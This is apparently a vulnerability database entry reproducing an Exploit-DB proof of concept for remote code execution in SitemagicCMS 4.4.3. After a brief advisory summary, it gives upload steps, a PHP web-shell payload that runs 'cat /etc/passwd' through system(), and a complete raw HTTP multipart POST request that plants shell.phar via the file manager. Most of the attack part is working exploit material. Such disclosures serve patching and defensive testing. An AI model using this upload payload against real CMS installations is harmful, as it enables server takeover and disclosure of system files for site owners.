SitemagicCMS 4.4.3 Remote Code Execution (RCE)

vendor:

SitemagicCMS

by:

Mirabbas Agalarov

7.5

CVSS

HIGH

RCE

CWE

Product Name: SitemagicCMS

Affected Version From: 4.4.2003

Affected Version To: 4.4.2003

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

SitemagicCMS 4.4.3 Remote Code Execution (RCE)

The SitemagicCMS version 4.4.3 is vulnerable to remote code execution (RCE). An attacker can upload a malicious shell.phar file with the content '<?php echo system("cat /etc/passwd"); ?>' and execute arbitrary commands on the target system. This can lead to unauthorized access, data leakage, and further compromise of the system. The vulnerability was found by Mirabbas Agalarov.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to update to a newer version of SitemagicCMS if available or consider using an alternative CMS.

Source

Exploit-DB raw data:

#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
#Application: SitemagicCMS
#Version: 4.4.3
#Bugs:  RCE
#Technology: PHP
#Vendor URL: https://sitemagic.org/Download.html
#Software Link: https://github.com/Jemt/SitemagicCMS
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================
steps: 
1. go to content then files 
2. upload shell.phar file but content as  <?php echo system("cat /etc/passwd"); ?>
3. go to  http://localhost/SitemagicCMS/files/images/shell.phar



payload: <?php echo system("cat /etc/passwd"); ?>



Poc request :

POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: localhost
Content-Length: 492
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
Connection: close

------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system('cat /etc/passwd'); ?>

------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMPostBackControl"


------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMRequestToken"

60a7a113cf94842a197912273825b421
------WebKitFormBoundarywPUsZSbtgJ6nAn8W--